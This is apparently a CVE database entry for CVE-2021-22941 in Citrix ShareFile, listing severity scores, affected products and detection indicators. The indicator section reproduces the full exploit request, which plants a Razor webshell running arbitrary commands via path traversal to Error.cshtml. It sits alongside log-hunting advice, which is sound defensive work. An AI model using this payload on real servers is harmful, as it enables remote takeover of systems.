cbcvebase.
CVE-2021-22941
published 2021-09-23

CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWRansomware
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
53.59%
98.9th percentile
Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.

Affected

9 ranges
VendorProductVersion rangeFixed in
citrixcitrix_adm
citrixcitrix_hypervisor
citrixcitrix_virtual_apps_and_desktops
citrixendpoint_management
citrixnetscaler_adc
citrixnetscaler_gateway
citrixsharefile
citrixsharefile_storagezones_controller< 5.11.205.11.20
citrixxenserver

Detection & IOCsextracted from sources · hover to see the quote

url/upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123
path/../../ConfigService\Views\Shared\Error.cshtml
path/upload.aspx
commanduploadid=@using+System.Diagnostics;@{int+idx0=+0;string+str_idx0+=+idx0.ToString();+int+idx1+=+1;string+str_idx1+=+idx1.ToString();string+cmd+=+Request.QueryString[str_idx0];string+arg+=+Request.QueryString[str_idx1];Process.Start(cmd,arg);}
filenameError.cshtml
  • Hunt IIS access logs for POST requests to /upload.aspx containing encoded path traversal strings for ../ and ConfigService\Views\Shared\Error.cshtml in URL parameters
  • Flag requests to /upload.aspx that include the default exploit parameters &bp=123&accountid=123, which are present in publicly available CVE-2021-22941 PoC exploits when the attacker has not customized the payload
  • The exploit delivers a Razor-syntax ASP.NET webshell via the uploadid parameter using Process.Start(cmd,arg) for arbitrary command execution; detect creation or modification of Error.cshtml under ConfigService\Views\Shared\
  • The vulnerability allows an adversary to overwrite an existing file on a target server via an uploadid parameter passed in an HTTP GET request; monitor for unexpected writes to .cshtml files in the ShareFile web root
  • ·The default exploit parameters bp=123&accountid=123 are only present when the attacker has not customized the payload; absence of these values does not rule out exploitation
  • ·Fully weaponized exploits for CVE-2021-22941 proliferated since mid-October 2021, meaning a wide variety of attacker tooling may produce different request signatures beyond the observed python-requests user agent

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.